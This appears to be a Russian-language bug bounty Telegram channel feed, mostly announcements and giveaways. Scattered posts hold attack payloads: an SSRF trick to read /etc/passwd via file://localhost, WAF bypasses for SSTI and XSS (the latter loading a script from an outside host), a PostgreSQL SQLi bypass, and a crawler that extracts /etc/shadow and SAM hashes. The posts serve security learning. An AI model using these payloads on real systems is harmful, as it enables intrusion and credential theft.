11515
Чат: @shadow_chat_tg Предложения, вопросы, сотрудничество: @shdwpwn
Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложить у себя в навыках ту или иную багу немного глубже.😵💫
Так вот, в итоге из этой мысли я сделал: https://labs.hackadvisor.io/
Все машинки собраны из публичных репортов и статей ресерчеров. Сейчас можно разворачивать стенд, решать задачи, получать подсказки и разбор уязвимости по итогу. Буду потихоньку пилить интересные машинки из раскрытых отчётов — надеюсь, вы тоже закинете что-то интересное: оно обязательно появится.
Сразу дисклеймер: у меня пока небольшой опыт в создании таких заданий, так что где-то может быть шероховато. Но со временем буду делать лучше — и сами задания, и их подачу — и добавлять больше интересных сценариев.
В целом Labs — это всего лишь MVP и первый этап будущей полноценной экосистемы HackAdvisor, которая, как и всё для сообщества, совершенно бесплатна.
Всех обнял, жду фидбек, баги и фича-реквесты🙌🏻
Ну и, пожалуйста, не ломайте сам Labs (даже если очень хочется) — пока там всё очень хрупко 🫠
Друзья, поздравляю вас с наступающим Новым годом 🎄
Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, новых положительных эмоций и ощущения, что вы идёте в правильном направлении.
Желаю интересных и результативных находок, роста там, где вам действительно важно, и достижения новых высот.
Постарайтесь отдохнуть в эти праздники и набраться сил. Пусть в новом году всё станет хотя бы немного лучше, чем в прошлом.
Спасибо, что вы здесь. Увидимся в 2026 ❤️
Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть на нем множество знакомых лиц из багбаунти сообщества. Я узнал примерно половину)
Читать полностью…
Проснулся, а тут RCE в React Server Functions с одного запроса уже выполняется. Жаркие споры вчера не прошли напрасно.
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
https://github.com/msanft/CVE-2025-55182
#web #rce #react
file://localhost/etc/passwd
что вернёт?
Да, вернётся /etc/passwd.
В RFC 8089, верный формат протокола описан как file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path>
Причём, в <host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS.
питон пок
from urllib.request import urlopen
content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')
print(content)
Представим, ты нашёл SSTI, но WAF блокирует символ$
Что делать?
\N{CHARACTER NAME}. \N{dollar sign}{7*7} == ${7*7} == 49Content-Disposition есть параметр filename?
# RFC 6266
filename="image.png"
# RFC 8187
filename*=UTF8''image%0a.png
filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % %0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. ⚀ разбор CVE из-за проблем синтаксиса [^]
⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^]
⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^]
1. обход фильтров SSTI [^]
2. иной подход к протоколу file:// [^]
3. проломparse_urlв PHP [^]
Выбор дополнительных победителей (в количестве 2):
🏆 Победители:
1. Alexey (@AlexeyInfosec)
2. Evktolly (@evktolly)
✔️Проверить результаты
Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как alert, document.cookie и других.
В таких случаях часто на помощь приходит функция import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации.
Для эксплуатации я использовал пэйлоад Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert.
Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ #. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.
javascript:import('//X55.is')//#alert('shdw')
®️ OFFZONE 2025 - ВСЁ
В этот раз 2 дня пролетели совсем незаметно. За это время успел со многими пообщаться и познакомиться, а также поучаствовать в некоторых активностях. Особый респект за мерч. В этом году, по моему скромному мнению, он был особенно хорош.
Спасибо @offzone_moscow за атмосферу, @bizone_bb за их ивенты, а всем вендорам за разнообразный скоуп. Ребятам из @vk_security отдельный респект за афтепати.
Рад был всех видеть и до новых встреч!
James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к моему большому респекту, подкрепил все это доступной лабой на Portswigger. Публичного решения нет, но лаба довольно простая. Теперь можно убивать HTTP/1.1 на реальных целях.
Читать полностью…
Нужны билеты на OFFZONE? Их есть у меня… Фул рандом, так что шанс есть у каждого. Розыгрыш продлится до утра 04.08.2025. Тыкайте кнопку для участия, а бот выберет 2-х победителей.
Читать полностью…
🐞 Дисклоуз в формате повести
«Все началось с обычного вечера, когда я, вооружившись чашкой кофе, проводил первичную разведку багбаунти-скоупа beget.com».
«Вас ждет увлекательное путешествие по лабиринтам кода с щепоткой криптографии и парой трюков, превративших, казалось бы, не входящий в скоуп хост в настоящий джекпот. В общем, не переключаемся, будет весело».
Это оно: обновление Standoff Hackbase наконец-то здесь!
Хакеры, приготовьтесь к революции на полигоне! Мы так долго этого ждали — и вот — то самое обещанное масштабное обновление Standoff Hackbase.
Итак, что нового?
🎯 Сезоны на Hackbase — время для регулярных свежих вызовов
Теперь на нашем онлайн-полигоне будут регулярно проходить сезоны, которые длятся ограниченное время, — тебя будут ждать новые, свежие сервисы, инфраструктуры и максимум возможностей для прокачки!
🎖Сезонный рейтинг — твой шанс стать номером один
Помимо привычного общего рейтинга, теперь у нас есть специальный — сезонный! Это значит, что для каждого нового сезона будет свой отдельный топ. По завершении каждого сезона трое лучших участников получат уникальные ачивки, так что заходи почаще. И да, не переживай, в общем рейтинге учитываются абсолютно все задания, которые ты выполняешь — и сезонные, и обычные.
🔨 Обновленные задания — ломай по-новому
Мы не только ввели сезоны, но и обновили инфрастуктуры. Например, тебя ждут встречи с инфраструктурой International Cybernetics Group (ICG) и нашей старой доброй банковской отраслью с новыми заданиями. Последняя вернется 14 июля — мы напишем об этом отдельно.
Standoff Standalone теперь тоже участвует в сезонах. Сейчас, в новом сезоне, на нем появился свежий уязвимый хост! Новые хосты тут будут появляться регулярно.
Обращаем внимание, что недавно выведенные машины вернутся на Standalone, и на них можно будет тренироваться вне сезона.
Самое время ворваться на обновленный Standoff Hackbase и показать, на что ты способен в этом сезоне 🔥
🌧Как мы получили хранимый XSS на каждом сайте AEM CLOUD, трижды
От банальной оплошности в проверке префикса пути и тонкостей кэширования CDN, до оригинального использования символов табуляции в URL и особенностей обработки редиректов в Fastly Edge Worker.
Читать статью
#web #xss #cloud #proxy
Server-Side XSS → SSRF → Компрометация облачной инфраструктуры: как одна картинка стоила целого облака
В этой статье разберем атаку, начавшуюся с уязвимости XSS в генераторе изображений и завершившуюся получением полного доступа к облачной инфраструктуре.
https://blog.deteact.ru/serverside-xss-ssrf-cloud-hacking/
Интересное видео с демонстрацией Account Takeover через punycode
https://youtu.be/Cj1sOFHDClM
А также статья с примером, как багхантер получил баунти за такую багу
https://infosecwriteups.com/the-most-underrated-0-click-account-takeover-using-punycode-idn-attacks-c0afdb74a3dc
🌚 @poxek
Захват аккаунта через telegram-бот: от своего номера к чужому профилю
Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных.
Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/
Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им большой респект 😎
Читать полностью…
Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты
На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным.
Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request.
Придумал обход используя dollar-quoting синтаксис PostgreSQL:
$$0$$OR-0-$$0$$NOTNULL
🎉 Результаты розыгрыша:
🏆 Победители:
1. Kot (@cyber_meow)
2. Rechnoj (@rechnoj)
3. Artur (@artur_almaev)
✔️Проверить результаты
🐞 Розыгрыш проходки на церемонию награждения BUGS ZONE 6.0
20 октября начнется любимый многими багхантерами BUGS ZONE 6.0. Традиционно нас ждет приватный скоуп, мерч, церемония награждения и мощное афтепати.
Потому запускаю розыгрыш 3 проходок на церемонию награждения, которая пройдет 7 ноября в Москве.
Условия простые:
1️⃣ Быть багхантером (достаточно одного оплаченного репорта за последний год на любой платформе). Отдельно попрошу пруфы у победителей в личке.
2️⃣ Быть подписанным на мой канал
Итоги подведу 19 октября - победитель получит приглашение на церемонию награждения BUGS ZONE 6.0 и сможет лично встретиться с командой платформы, триажерами и топовыми хантерами сезона.
Следите за апдейтами и удачи всем!
Наконец-то начали уже появляться в паблике некоторые доклады с Pentest Award и вот вам некоторые из них:
Во первых, прекрасный доклад от Ирины Беляевой, которая получила третье место в номинации "Пробив инфраструктуры", и поведала нам о том, как через принтер в переговорке удалось добраться до промышленной системы управления.
Во вторых, для всех фанатов киберпанка, @VeeZy_VeeZy подготовил футуристичный рассказ под названием 4911 про его встречу с формой входа и неожиданный обход OTP. Доклад стал фаворитом по версии жюри и определенно заслужил вашего внимания.
🎉 Результаты розыгрыша:
🏆 Победители:
1. 0tchim (@CryptoGodum)
2. Yaya (@yayatoure7)
✔️Проверить результаты
Заскочил в топ-10 на Pentest Awards, с рассказом про похек логики. Интересно теперь, попал в призовые или нет
Читать полностью…
10 июля заканчивается прием заявок на доклады OFFZONE 2025. Если у вас есть чем поделиться с комьюнити, то еще не поздно отправить свою заявку
Читать полностью…
Сейчас мой краулер (https://github.com/s0i37/crawl) парсит следующие форматы: word, excel, презентации, visio, pdf - из всех этих типов умеет извлекать вложенные картинки, так же парсит все типы архивов с бесконечной вложенностью, cab/rpm/deb-пакеты, все исполняемые файлы (pe,elf), распознает текст на картинках (ru,en), в аудио (ru,en), с fps=1 распознает что есть в видео включая звук, извлекает thumbs.db, sqlite, дампы трафика, lnk-файлы, декомпилирует байткод, и логи винды evtx - одним словом всё, чаще всего лежит на шарах. И делает это все за какие то 300 строк кода на bash.
А теперь благодаря специально собранному мини образу alpine, с ntfs-3g и impacket, запускаему через qemu, краулер из любого образа диска быстро и без скачивания извлечет /root/.bash_history, /home/*/.bash_history, /etc/shadow, историю браузера, а так же хэши sam и security.
Прием заявок на Pentest Award заканчивается 30 июня. Если вы, как и я, еще не успели отправить свою статью, но есть желание, то сейчас еще не поздно.
Я в том году, писал райтап по своей находке в рамках багбаунти. Зашел на сайт, чтобы скрины поделать, а в итоге нашел еще пару критов, тк в личном кабинете за это время обновился функционал.
Как итог, в призовые я не попал, но свою награду все таки нашел.
Там ребята из BI.ZONE Bug Bounty сейчас активно ищут себе триажера на платформу. Все желающие могут напрямую скинуть своё резюме @Andrew_Levkin или @nKuz98.
Читать полностью…